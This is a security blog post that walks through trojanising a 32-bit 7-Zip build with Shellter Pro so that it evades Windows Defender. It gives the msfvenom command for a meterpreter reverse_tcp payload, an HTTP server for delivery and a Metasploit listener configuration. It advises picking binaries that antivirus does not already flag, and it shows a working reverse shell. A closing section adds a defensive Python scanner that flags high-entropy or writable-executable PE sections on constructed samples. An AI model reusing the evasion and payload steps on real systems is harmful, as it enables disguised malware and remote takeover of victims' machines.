DMZERO LABS

Showcasing Red & Blue team operations to help protect organisations against sophisticated attacks


Using Shellter Pro for dynamic shellcode injection

We are going to use Shellter Pro's auto-mode to inject a listed payload, "windows/meterpreter/reverse_tcp", into an alpha version of 7-Zip. The file we use has to be 32-bit, since there is no support for 64-bit applications at the time of writing. One thing to note about using this tool to infect legitimate PEs is that you have to pick an application that is not already flagged by AV for any reason.

What tends to happen is that once multiple users start using the same PE for infection and the files get uploaded to tools like VirusTotal, the detection rates go up. If you are testing this out, I suggest you find a lightweight application and check whether there are any detections on the file before proceeding. Some of the other articles I am planning to write will cover more advanced capabilities of the tool: chaining multiple payloads, custom shellcode and various other options available within the tool.

Lab setup

  1. Windows 10 Victim - Patched & Running Windows Defender
  2. Kali Linux waiting to receive shellz
  3. Shellter

Before we start, let's run a quick test to see whether Defender is actually able to catch our very basic, generic payload. This is something that should be picked up by many AV vendors; in later blogs we will also explore how you can take a payload like this and use various techniques to make it slip through.

First things first, let's generate a generic EXE with msfvenom to showcase this:

//msfvenom to generate exe
~/msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

After this, the simplest way to move the file over is by hosting an HTTP server that the victim can download the file from:

//HTTP server setup
~/python -m SimpleHTTPServer 80


We also need to setup our listener on our attacker host:

//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443

And as expected Windows Defender saves the day :)


The idea now is to try some of the magic that Shellter has to offer. We are going to use the standard settings available within the tool and see how injecting the same payload gets past Windows Defender.

//Shellter Pro using default configuration
1. Put Shellter in Automatic mode
2. Check online for updates
3. Select PE - 7-Zip, renamed to 1.exe for ease
4. Turn on stealth mode
5. For the remaining prompts, use the basic features that ship with the tool


Now that we have our malicious file ready for execution let’s see how Windows Defender handles this. We will copy the file over to our victim machine and execute it.

We use the same configuration for our Metasploit handler:

//msfconsole for our session
~/msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 443


As we can see from the above, the 7-Zip application functions as expected, and we receive a fully interactive Meterpreter shell back on the attacker host :)
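From the defender's side, the interesting question is what a file like this looks like once it has been handed to a triage pipeline rather than to a signature engine. The following is an added example, not code from the original post and not anything Shellter itself does: a small PE section walker that computes the Shannon entropy of every section and flags executable sections that are either high-entropy (encoded or encrypted code rather than ordinary compiled x86) or both writable and executable. The post does not describe how Shellter rewrites the 7-Zip binary, so the "backdoored" sample below is a constructed stand-in whose .text section is filled with pseudo-random bytes; the 7.0 bits/byte threshold, the minimal PE builder and the section names are all assumptions made for the example.

```python
import hashlib
import math
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumed threshold: ordinary compiled x86 code sits well below 7 bits/byte;
# encoded/encrypted payloads approach 8.
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data):
    """Shannon entropy in bits per byte of a byte string."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk the section table of a PE image and return per-section metadata and entropy."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    off = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for _ in range(nsections):
        (name, _vsize, _vaddr, rawsize, rawptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "rawsize": rawsize,
            "characteristics": chars,
            "entropy": shannon_entropy(raw),
        })
        off += 40
    return sections


def suspicious_sections(pe):
    """Return (section name, reason) pairs for sections a triage analyst would look at first."""
    findings = []
    for s in parse_sections(pe):
        exe = bool(s["characteristics"] & IMAGE_SCN_MEM_EXECUTE)
        wr = bool(s["characteristics"] & IMAGE_SCN_MEM_WRITE)
        if exe and s["entropy"] > ENTROPY_THRESHOLD:
            findings.append((s["name"], "high-entropy executable section (%.2f bits/byte)" % s["entropy"]))
        if exe and wr:
            findings.append((s["name"], "section is both writable and executable"))
    return findings


def build_pe(sections):
    """Construct a minimal PE image (DOS stub, COFF header, section table, raw data) for offline testing.
    The optional header is omitted (SizeOfOptionalHeader = 0); only the section table matters here."""
    e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    hdr_end = e_lfanew + 4 + 20 + 40 * len(sections)
    data_off = (hdr_end + 0x1FF) & ~0x1FF  # pad raw data out to a 0x200 file alignment
    table, blobs, rawptr, vaddr = b"", b"", data_off, 0x1000
    for name, raw, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), rawptr, 0, 0, 0, 0, chars)
        blobs += raw
        rawptr += len(raw)
        vaddr += 0x1000
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    image = dos + b"PE\0\0" + coff + table
    return image + b"\0" * (data_off - len(image)) + blobs


def pseudo_random(n, seed=b"constructed-sample"):
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for an encoded payload."""
    out, h = b"", seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:n]


# Constructed samples: a "clean" image whose .text is low-entropy repetitive code-like bytes,
# and a "backdoored" stand-in whose .text has been replaced with high-entropy bytes.
CODE_FLAGS = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_FLAGS = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CLEAN_PE = build_pe([(b".text", bytes(range(16)) * 256, CODE_FLAGS), (b".data", b"\0" * 1024, DATA_FLAGS)])
BACKDOORED_PE = build_pe([(b".text", pseudo_random(4096), CODE_FLAGS), (b".data", b"\0" * 1024, DATA_FLAGS)])

if __name__ == "__main__":
    for label, pe in (("clean", CLEAN_PE), ("backdoored", BACKDOORED_PE)):
        print(label, suspicious_sections(pe) or "no findings")
```

On a real sample you would read the file with `open(path, "rb").read()` and pass it to `suspicious_sections`; the heuristic is deliberately coarse (packed or signed-but-compressed installers also trip it), so treat a hit as a reason to pull the file into a sandbox or compare its hash against the vendor's published binary, not as a verdict on its own.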

That's it for this entry; in some future blogs we will look at how some of the more advanced AVs fare against this type of attack.